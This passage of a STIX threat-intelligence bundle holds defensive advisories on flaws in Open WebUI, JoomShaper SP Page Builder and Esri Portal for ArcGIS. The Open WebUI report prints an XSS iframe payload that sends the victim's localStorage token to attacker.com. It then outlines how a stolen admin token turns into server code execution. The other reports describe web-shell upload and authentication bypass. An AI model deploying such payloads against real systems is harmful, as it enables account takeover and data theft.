administrator is targeted and views the malicious citation, the XSS payload can be used to bypass security controls and potentially achieve server-side Remote Code Execution (RCE) by chaining with other known vulnerabilities, as described in GHSA-w7xj-8fx7-wfch. This poses a significant risk to the integrity and confidentiality of data within the Open WebUI environment.\n\n## Recommendation\n\n*   **Patch CVE-2026-26192 immediately:** Upgrade all Open WebUI installations to version 0.7.0 or newer to mitigate the vulnerability.\n*   **Implement Web Application Firewall (WAF) rules:** Configure a WAF to inspect `POST` requests to chat history save endpoints for unusual modifications like the addition of `html: true` in JSON bodies, and block requests containing common XSS payload patterns in document content, though this may require product-specific WAF configuration for JSON body inspection.\n*   **Educate users on phishing awareness:** Warn users about suspicious shared chat links or messages that encourage clicking on document citations from unknown or untrusted sources.\n",
      "published": "2026-07-07T16:56:32Z",
      "labels": [
        "xss",
        "web-application",
        "vulnerability",
        "client-side-injection",
        "open-webui"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-xc8p-9rr6-97r2"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b919a210-883b-58cb-8324-b946731432ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://openwebui.com/c/\u003cuser\u003e/\u003cchat_id\u003e",
      "pattern": "[url:value = 'https://openwebui.com/c/\u003cuser\u003e/\u003cchat_id\u003e']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T16:57:54Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8db3e9fe-281c-5f16-84d8-9d208f526573",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "indicator--b919a210-883b-58cb-8324-b946731432ae"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0a775845-d0fb-591d-995e-f1113dc3e8b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://localhost:8080/api/v1/files/",
      "pattern": "[url:value = 'http://localhost:8080/api/v1/files/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T16:57:54Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ae5c52a2-46b1-5a01-b8e8-d50fa602b461",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "indicator--0a775845-d0fb-591d-995e-f1113dc3e8b7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--aef3b0ec-db3e-5200-a586-b38e60310d80",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://attacker.com/?token=",
      "pattern": "[url:value = 'https://attacker.com/?token=']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T16:57:54Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--afe2d21d-8cd5-5a3b-b490-4f5059d43916",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "indicator--aef3b0ec-db3e-5200-a586-b38e60310d80"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7d6b0ff5-595c-5dd0-bfd8-c647ce755f3a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: openwebui.com",
      "pattern": "[domain-name:value = 'openwebui.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T16:57:54Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--58da2f7f-a0eb-5b65-a46d-45e4c97c3d35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "indicator--7d6b0ff5-595c-5dd0-bfd8-c647ce755f3a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2da97a62-2f21-5773-a5eb-8c973d899d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/open-webui/open-webui/blob/main/src/lib/components/chat/Messages/Markdown/MarkdownTokens.svelte#L269-L279",
      "pattern": "[url:value = 'https://github.com/open-webui/open-webui/blob/main/src/lib/components/chat/Messages/Markdown/MarkdownTokens.svelte#L269-L279']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T16:57:54Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c84cd59e-eae8-566f-ac6d-6975546c6161",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "indicator--2da97a62-2f21-5773-a5eb-8c973d899d9c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5488041a-5c2e-516d-ae7a-6c04bb6bf752",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://localhost:5174/admin/functions",
      "pattern": "[url:value = 'http://localhost:5174/admin/functions']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T16:57:54Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1e78f08-5979-5e8b-9106-857bca68e231",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "indicator--5488041a-5c2e-516d-ae7a-6c04bb6bf752"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6880ba60-3009-5a5d-8521-b7917f8505e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1539",
          "url": "https://attack.mitre.org/techniques/T1539"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4a1b05db-6e29-55df-9a0e-83688b46ef68",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8cca96b0-20f6-5d47-b657-76005f36dc5d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--76ede378-6273-5cfe-b9a8-f201f558b8cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--70089755-a6a1-56a7-b36b-0888a2a479fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fc29b21a-cc75-52eb-ba6d-074eee978597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open WebUI Stored XSS Leads to Account Takeover and RCE (CVE-2025-46719)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2025-46719, affects Open WebUI versions prior to 0.6.6, allowing for stored Cross-Site Scripting (XSS) attacks. The flaw stems from the `MarkdownTokens.svelte` component, which improperly renders specific HTML tags within chat messages, enabling JavaScript injection. Attackers can embed malicious scripts in chat transcripts that execute when a user views the message, leading to the theft of access tokens and full account compromise. If an administrator account is targeted, the stolen token can be used to achieve Remote Code Execution (RCE) on the Open WebUI backend server by creating functions with arbitrary Python code. This vulnerability is \"wormable,\" as infected chat transcripts can be shared across the same server or uploaded to the public `openwebui.com` platform, spreading the exploit to other users upon viewing.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious chat message containing an `\u003ciframe\u003e` tag with an `onload` event, designed to exfiltrate access tokens (e.g., `\u003ciframe src=\"http://localhost:8080/api/v1/files/\" onload=\"fetch('https://attacker.com/?token=' + localStorage.getItem('token'))\"\u003e\u003c/iframe\u003e`).\n2.  The attacker sends this malicious chat message within the Open WebUI application.\n3.  A victim user, potentially an administrator, opens the infected chat transcript, causing the embedded malicious `\u003ciframe\u003e` to render.\n4.  The malicious JavaScript embedded in the `onload` attribute executes in the victim's browser, fetching and exfiltrating the victim's session access token to the attacker-controlled server.\n5.  If the victim was an administrator, the attacker uses the stolen admin access token to authenticate to the Open WebUI backend API.\n6.  The attacker sends a POST request to the `/api/v1/functions` endpoint (e.g., `http://localhost:5174/admin/functions`) with a JSON payload containing malicious Python code.\n7.  The Open WebUI backend server processes and executes the malicious Python code within the newly created function, leading to Remote Code Execution on the underlying host system.\n8.  The attacker achieves full control over the Open WebUI instance and potentially the underlying server.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-46719 can lead to severe consequences. Users are at risk of full account takeover through stolen access tokens, enabling attackers to impersonate them, access their data, and manipulate their chat history. The wormable nature of the XSS means that merely viewing an infected chat transcript can compromise a user, allowing the attack to spread rapidly, especially if \"Enable Community Sharing\" is active on `openwebui.com`. If an administrative account is compromised, the attacker can leverage the RCE capability to execute arbitrary code on the server hosting Open WebUI, potentially gaining full control of the server, exfiltrating sensitive data, or deploying further malware.\n\n## Recommendation\n\n*   Immediately update Open WebUI installations to version 0.6.6 or newer to remediate CVE-2025-46719.\n*   Review web server access logs for POST requests to `/api/v1/functions` from non-administrative or unexpected sources, as this endpoint is used for RCE.\n*   Monitor network traffic for outbound connections to suspicious or unknown domains from Open WebUI client systems, which could indicate exfiltration of `localStorage` tokens as referenced in `https://attacker.com/?token=`.\n*   Educate users on the risks of opening chat transcripts from untrusted sources, especially those containing `\u003ciframe\u003e` tags or unusual content, even if the domain `http://localhost:8080/api/v1/files/` is present.\n",
      "published": "2026-07-07T16:57:54Z",
      "labels": [
        "xss",
        "rce",
        "web-application",
        "open-webui"
      ],
      "object_refs": [
        "indicator--b919a210-883b-58cb-8324-b946731432ae",
        "indicator--0a775845-d0fb-591d-995e-f1113dc3e8b7",
        "indicator--aef3b0ec-db3e-5200-a586-b38e60310d80",
        "indicator--7d6b0ff5-595c-5dd0-bfd8-c647ce755f3a",
        "indicator--2da97a62-2f21-5773-a5eb-8c973d899d9c",
        "indicator--5488041a-5c2e-516d-ae7a-6c04bb6bf752",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9f4f-jv96-8766"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8853cdb6-8971-5984-b0c9-53b7b60894bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5f8355b8-e1a4-57a0-b960-1aed4fe0206d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f6ce0d26-54b3-5178-8c1d-50944375bf0f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5f8355b8-e1a4-57a0-b960-1aed4fe0206d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c81cdba8-bd82-5f8e-bbe5-99c9b4f8c98c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5f8355b8-e1a4-57a0-b960-1aed4fe0206d",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5f8355b8-e1a4-57a0-b960-1aed4fe0206d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-48908 - JoomShaper SP Page Builder Unrestricted File Upload leading to RCE",
      "description": "## Overview\n\nJoomShaper SP Page Builder, a popular Joomla extension, is affected by a critical vulnerability, CVE-2026-48908, that permits unauthenticated users to upload arbitrary files with dangerous extensions. This flaw allows attackers to bypass file type restrictions, facilitating the upload of malicious PHP web shells directly onto the affected server. Once uploaded, these PHP files can be executed, granting the attacker remote code execution capabilities. This vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, indicating that it is either actively exploited in the wild or poses a significant risk that warrants immediate remediation. Organizations using affected versions of SP Page Builder are at high risk of server compromise, data exfiltration, or further network penetration. The CISA KEV listing underscores the urgency for defenders to apply vendor patches and implement detection mechanisms for this critical flaw.\n\n## Attack Chain\n\n1.  **Initial Access (Vulnerability Identification)**: An unauthenticated attacker identifies a publicly accessible web server running a vulnerable version of JoomShaper SP Page Builder.\n2.  **Vulnerability Exploitation (Malicious File Upload)**: The attacker crafts a malicious HTTP POST request targeting an accessible upload function within SP Page Builder, leveraging CVE-2026-48908 to bypass file type restrictions.\n3.  **Payload Delivery**: The attacker successfully uploads a PHP web shell (e.g., `shell.php`, `backdoor.php`) or other dangerous file type to a publicly accessible directory on the web server (e.g., `/images/`, `/media/`, `/uploads/`).\n4.  **Persistence (Web Shell Placement)**: The malicious PHP file is stored on the server, establishing a persistent foothold that can be accessed later.\n5.  **Execution (Web Shell Activation)**: The attacker then sends a subsequent HTTP GET or POST request directly to the URL of the newly uploaded PHP web shell to trigger its execution.\n6.  **Remote Code Execution (RCE)**: Upon activation, the web shell executes arbitrary PHP functions and system commands, providing the attacker with control over the underlying operating system.\n7.  **Post-Exploitation Activity**: The attacker can use the RCE to perform reconnaissance, escalate privileges, exfiltrate sensitive data, deploy additional malware (e.g., ransomware), or establish further command and control infrastructure.\n8.  **Impact**: The successful execution of arbitrary PHP code leads to full server compromise, unauthorized data access, or disruption of services.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-48908 leads to immediate and critical impact, enabling unauthenticated attackers to achieve remote code execution on the web server hosting JoomShaper SP Page Builder. This allows for full server compromise, including unauthorized access to sensitive data, modification or deletion of website content, and the ability to pivot to other systems within the network. Given its presence on CISA's KEV catalog, this vulnerability poses a severe threat of active exploitation in the wild, potentially affecting numerous organizations across various sectors, especially those relying on Joomla for their web presence. The ultimate consequences can range from data breaches and defacement to complete business disruption and the deployment of ransomware.\n\n## Recommendation\n\n*   **Patch CVE-2026-48908 immediately** on all internet-facing JoomShaper SP Page Builder instances in accordance with vendor instructions.\n*   **Deploy the Sigma rules in this brief** to your SIEM and tune them for your environment to detect attempts to exploit CVE-2026-48908.\n*   **Review web server logs** for unusual `POST` requests targeting upload paths and `GET`/`POST` requests to unexpected `.php` files in user-writable directories, as described in the detection rules.\n*   **Implement strict file upload validation** (type, size, content) at the web server and application layers to prevent similar vulnerabilities.\n*   **Monitor server logs for unusual process creation** or network connections originating from the web server process, indicative of post-exploitation activity following successful RCE.\n",
      "published": "2026-07-07T17:04:51Z",
      "labels": [
        "web-exploit",
        "cve",
        "rce",
        "php",
        "cisa-kev"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-48908"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48908"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extension/sp-page-builder/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--079b98b6-1be4-52fd-be0c-6c4eb15fedc0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85297e92-4875-5c24-810b-769ffc9e59cd",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--85297e92-4875-5c24-810b-769ffc9e59cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical Unauthenticated API Access in Esri Portal for ArcGIS (CVE-2026-13019)",
      "description": "## Overview\n\nA critical missing authentication vulnerability, tracked as CVE-2026-13019, has been identified in Esri Portal for ArcGIS versions 12.1 and earlier. This flaw allows a remote, unauthenticated attacker to bypass authentication mechanisms and directly access critical API functions. With a CVSS v3.1 base score of 9.8, this vulnerability poses an extreme risk, enabling attackers to potentially manipulate or extract sensitive Geographic Information System (GIS) data, compromise system integrity, or perform unauthorized administrative operations. The vulnerability affects deployments across various platforms, including Windows, Linux, and Kubernetes environments, making a wide range of organizations using Esri's GIS solutions susceptible to compromise. Immediate patching is imperative to mitigate the risk of unauthorized access and potential data breaches.\n\n## Attack Chain\n\n1.  Attacker identifies a public-facing Esri Portal for ArcGIS instance running version 12.1 or earlier.\n2.  Attacker researches or discovers the specific critical API endpoints vulnerable to authentication bypass.\n3.  Attacker crafts an HTTP request targeting a known critical API endpoint on the vulnerable Esri Portal for ArcGIS system.\n4.  The crafted request is sent to the Esri Portal for ArcGIS web server without including valid authentication credentials.\n5.  Due to the missing authentication vulnerability (CVE-2026-13019), the Esri Portal for ArcGIS processes the unauthenticated request as if it were legitimate.\n6.  The attacker successfully gains unauthorized access to the unprotected critical API, enabling them to invoke sensitive functions or retrieve privileged information.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-13019 grants remote, unauthenticated attackers full access to critical API functions within Esri Portal for ArcGIS. This can lead to a range of severe consequences, including unauthorized viewing, modification, or deletion of sensitive GIS data, system configuration changes, and potentially full compromise of the Esri Portal infrastructure. Organizations in sectors relying heavily on GIS data, such as government, utilities, and infrastructure, are particularly at risk. The broad platform applicability (Windows, Linux, Kubernetes) means a wide array of deployments are exposed, potentially leading to widespread data breaches or operational disruption.\n\n## Recommendation\n\n*   Patch CVE-2026-13019 on all Esri Portal for ArcGIS instances immediately by upgrading to a patched version (12.2 or later) or applying the vendor-provided security updates.\n*   Review Esri Portal for ArcGIS web server access logs for anomalous unauthenticated access patterns to API endpoints that could indicate attempted or successful exploitation of CVE-2026-13019.\n",
      "published": "2026-07-07T17:17:53Z",
      "labels": [
        "vulnerability",
        "esri",
        "arcgis",
        "unauthenticated-access",
        "api-security",
        "rce"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13019"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be3eff89-210d-5ea2-86c0-dfc8f2f2e1f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--13af0491-a963-55a2-b489-6a41a6408d0e",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9bdefa14-799c-52f8-a1d4-3ff3440e778a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--13af0491-a963-55a2-b489-6a41a6408d0e",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--13af0491-a963-55a2-b489-6a41a6408d0e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-13020: Weak Password Recovery in Esri Portal for ArcGIS Leading to Account Takeover",
      "description": "## Overview\n\nCVE-2026-13020 identifies a significant security vulnerability within Esri Portal for ArcGIS, impacting versions 12.1 and earlier across Windows, Linux, and Kubernetes deployment environments. The flaw stems from a weak password recovery mechanism, which an unauthorized remote attacker can exploit to gain full control over a user's account. This vulnerability does not require prior authentication, making it a critical threat to the confidentiality and integrity of user data and system access within affected ArcGIS deployments. Organizations using these versions are advised to configure their ArcGIS Enterprise with an email server to facilitate a more secure self-service password recovery process and mitigate this risk. The ability for an administrator to reset a user’s password is not affected by this vulnerability.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Targeting:** An unauthorized attacker identifies a vulnerable Esri Portal for ArcGIS instance (version 12.1 or earlier) and selects a target user account within the portal.\n2.  **Initiate Password Recovery:** The attacker navigates to the \"forgot password\" or account recovery section of the Esri Portal and initiates the password reset process for the targeted user account.\n3.  **Exploit Weak Mechanism:** The attacker leverages the weak password recovery mechanism (specific exploitation details are not provided by the source, but it implies a flaw in the process itself) to bypass legitimate verification steps.\n4.  **Gain Reset Capability:** Through successful manipulation, the attacker gains unauthorized access to the password reset functionality for the target account.\n5.  **Password Reset:** The attacker sets a new, attacker-controlled password for the target user's account.\n6.  **Account Takeover:** The attacker logs into the Esri Portal for ArcGIS using the newly set credentials, effectively assuming ownership of the target user's account.\n7.  **Access \u0026 Impact:** The attacker now has full access to the compromised user's data, maps, applications, and permissions within the Portal, potentially leading to data exfiltration, modification, or further lateral movement.\n\n## Impact\n\nThe successful exploitation of CVE-2026-13020 can lead to severe consequences, primarily account takeover. This allows remote, unauthorized attackers to gain full access to compromised user accounts within Esri Portal for ArcGIS versions 12.1 and earlier, irrespective of the underlying operating system (Windows, Linux, or Kubernetes). Attackers could then access sensitive geospatial data, manipulate mapping services, or leverage elevated privileges if an administrative account is compromised. While the source does not provide specific victim counts, any organization utilizing vulnerable versions of Esri Portal for ArcGIS is at risk of unauthorized access, data breaches, and potential operational disruption.\n\n## Recommendation\n\n*   Immediately identify and patch Esri Portal for ArcGIS instances to a version higher than 12.1 to address CVE-2026-13020.\n*   Configure an email server with ArcGIS Enterprise to enable secure user self-service password recovery, as recommended for CVE-2026-13020.\n*   Review all user accounts for any suspicious password changes or unusual activity that might indicate an account takeover resulting from CVE-2026-13020 exploitation.\n",
      "published": "2026-07-07T17:18:49Z",
      "labels": [
        "vulnerability",
        "web-application",
        "account-takeover",
        "esri"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13020"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b5605d4-8578-52e3-ad92-de04f7245f3e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--134d17ac-f588-5215-82d1-ea6d51cda5b4",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
